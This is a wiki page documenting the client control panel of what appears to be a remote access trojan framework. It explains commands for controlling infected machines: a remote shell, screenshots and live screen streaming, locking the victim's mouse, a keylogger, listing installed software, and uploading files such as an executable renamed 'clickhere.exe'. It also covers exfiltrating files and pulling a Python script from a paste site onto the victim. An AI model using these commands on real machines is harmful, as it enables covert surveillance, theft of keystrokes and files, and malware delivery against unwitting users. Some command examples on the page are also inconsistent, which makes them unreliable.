Skip to content

Client Control Panel

Gustavo edited this page Feb 16, 2021 · 4 revisions

After you create and execute the script in the host target, the host target will send a fingerprint with some informations to the server, it will possibilite to the host connect with the server. When the host connected with the server it will calLed of client. To update the client list press the circular arrow button in the principal menu.

For every client connected will have a button with name of it, you can check it in the hosts button.

If you click in any client name you'll came across with the control panel, that is basically is a panel to control the specific client.

Client terminal, you can type commands like a real terminal;

Lite terminal, you can do some extra functions. It works together with the client terminal;

Button to update the screenshot of client;

After you update the screenshot it will appear in this window;

When you press this button the mouse of client will be "locked", basically the client mouse will going infitly to left and precluding the use of mouse;

Unlock the client mouse;

Downloads a screenshot of client and save in a specific path of computer;

Opens a pop-up window and shows a video streaming of screen of client.

Client Terminal

-clear ⇨ Clear all content in the Client Terminal window

-fontsize ⇨ Change the fontsize of Client Terminal

-fontsize 13

-restart ⇨ Sends a signal to client restart the script

-print ⇨ Saves all the Client Terminal content to a text file.

-history ⇨ Shows the history of commands typed in the client Terminal.

-restore ⇨ Restores the STDOUT of last command typed.

-fput ⇨ Fput will create a crypt version of file of server path and will send the bytes to the client. For usage you'll need to set the path of file that you want to send <server_path> and set the path where the file will be saved <client_path>.

Kali Linux: server - Windows: client

-fput /home/kali/desktop/script.ps1 /: C:\Users\Lsy\Desktop\script.ps1

-fput /home/kali/desktop/sample.exe /: C:/Users/Lsy/Desktop/clickhere.exe

-fget ⇨ Similar of the Fput, the client will create an encrypted version of the file and send bytes to the server. For usage you'll need to set the path of file that you want to donwload <client_path> and set the path where the file will be saved <server_path>.

Kali Linux: server - Windows: client
 
-fput C:\Users\Lsy\Desktop\image.png /: /home/kali/image.png

-fput /home/kali/desktop/sample.exe /: C:/Users/Lsy/Desktop/clickhere.exe

Lite Terminal

-help ⇨ Shows all reserved commands of Lite Terminal.

-clear ⇨ Clears all content in the Lite Terminal window.

-info ⇨ Shows all information about host contained in the host fingerprint.

-fontsize ⇨ Change the fontsize of client Terminal.

-fontsize 13

-history ⇨ Shows the history of commands typed in the client Terminal.

-softwares ⇨ Sends a signal to client to list all installed softwares and returns to server the list of softwares.

-keylogger start ⇨ Starts the keyboard capture on the client side.

-keylogger stop ⇨ Stops the keyboard capture on the client side.

-keylogger print ⇨ Gets the typed keys log.

-webget ⇨ Download a file from URL.

Downloading the steam installer - Client: Kali Linux

-wget https://cdn.akamai.steamstatic.com/client/installer/SteamSetup.exe -f /home/kali/desktop/steam.exe 

-webraw ⇨ Download the text of a RAW HTTP page.

 Downloading a Python script from a RAW HTTP page - Client: Windows

-webraw http://dontpad.com/blackmambaframework.txt -f C:\Users\Lsy\Desktop\python_script.py

-svideosizeSets ⇨ Sets the size of video stream window.

Clone this wiki locally